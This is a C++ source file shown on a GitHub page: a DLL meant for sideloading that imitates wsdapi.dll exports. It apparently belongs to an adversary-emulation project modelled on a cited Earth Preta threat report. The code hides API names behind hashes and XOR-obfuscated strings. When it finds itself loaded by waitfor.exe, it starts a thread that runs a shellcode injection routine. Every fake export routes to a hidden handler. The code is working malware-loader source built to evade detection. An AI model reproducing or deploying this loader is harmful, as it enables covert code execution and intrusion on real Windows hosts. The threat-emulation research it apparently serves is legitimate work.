-
Notifications
You must be signed in to change notification settings - Fork 21
Expand file tree
/
Copy pathdllmain.cpp
More file actions
131 lines (114 loc) · 4.02 KB
/
dllmain.cpp
File metadata and controls
131 lines (114 loc) · 4.02 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
#include "handler.hpp"
#include "handler_util.hpp"
// Returns true if the loading process is waitfor.exe, false otherwise.
BOOL InWaitforProcess() {
GetModuleFileNameW_t fp_GetModuleFileNameW = RESOLVE_FN_FNV1A(XorStringW(L"Kernel32.dll"), GetModuleFileNameW);
if (!fp_GetModuleFileNameW) {
return FALSE;
}
wchar_t buf[MAX_PATH];
DWORD result = fp_GetModuleFileNameW(NULL, buf, MAX_PATH);
if (!result) {
return FALSE;
}
return _wcsicmp(buf, XorStringW(L"C:\\Windows\\System32\\waitfor.exe")) == 0;
}
/*
* DllMain:
* About:
* If loaded by waitfor.exe, will create a thread to run the shellcode
* payload injection routine. Otherwise, simply returns.
* CTI:
* https://www.trendmicro.com/en_us/research/25/b/earth-preta-mixes-legitimate-and-malicious-components-to-sidestep-detection.html
*/
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
switch(fdwReason) {
case DLL_PROCESS_ATTACH:
if (InWaitforProcess()) {
CreateThread_t fp_CreateThread = RESOLVE_FN_FNV1A(XorStringW(L"Kernel32.dll"), CreateThread);
if (!fp_CreateThread) {
return FALSE;
}
HANDLE h_thread = fp_CreateThread(
NULL,
0,
(LPTHREAD_START_ROUTINE)RunPayload,
NULL,
0,
NULL
);
if (h_thread == NULL) {
return FALSE;
}
}
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
// https://github.com/tpn/winsdk-10/blob/master/Include/10.0.16299.0/um/Wsdutil.h
__declspec(dllexport) HRESULT WINAPI
WSDSetConfigurationOption(DWORD dwOption, _In_reads_bytes_(cbInBuffer) LPVOID pVoid, DWORD cbInBuffer) {
Handler();
return 0;
}
// https://github.com/tpn/winsdk-10/blob/master/Include/10.0.16299.0/um/Wsdxml.h
__declspec(dllexport) HRESULT WINAPI
WSDXMLCreateContext(_Outptr_ void** ppContext) {
Handler();
return 0;
}
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdutil.h
__declspec(dllexport) void WINAPI
WSDFreeLinkedMemory(void *pVoid) {
Handler();
}
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsddisco.h
__declspec(dllexport) HRESULT WINAPI
WSDCreateDiscoveryPublisher(void* pContext, _Outptr_ void** ppPublisher) {
Handler();
return 0;
}
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdutil.h
__declspec(dllexport) void WINAPI
WSDAttachLinkedMemory(void* pParent, void* pChild) {
Handler();
}
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdhost.h
__declspec(dllexport) HRESULT WINAPI
WSDCreateDeviceHost(
_In_ LPCWSTR pszLocalId,
void* pContext,
_Outptr_ void** ppDeviceHost) {
Handler();
return 0;
}
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdutil.h
__declspec(dllexport) void * WINAPI
WSDAllocateLinkedMemory(void* pParent, size_t cbSize) {
Handler();
return NULL;
}
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdhost.h
__declspec(dllexport) HRESULT WINAPI
WSDCreateDeviceHostAdvanced(
_In_ LPCWSTR pszLocalId,
void* pContext,
_In_reads_opt_(dwHostAddressCount) void** ppHostAddresses,
DWORD dwHostAddressCount,
_Outptr_ void** ppDeviceHost)
{
Handler();
return 0;
}
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdbase.h
__declspec(dllexport) HRESULT WINAPI
WSDCreateHttpAddress(_Outptr_ void** ppAddress) {
Handler();
return 0;
}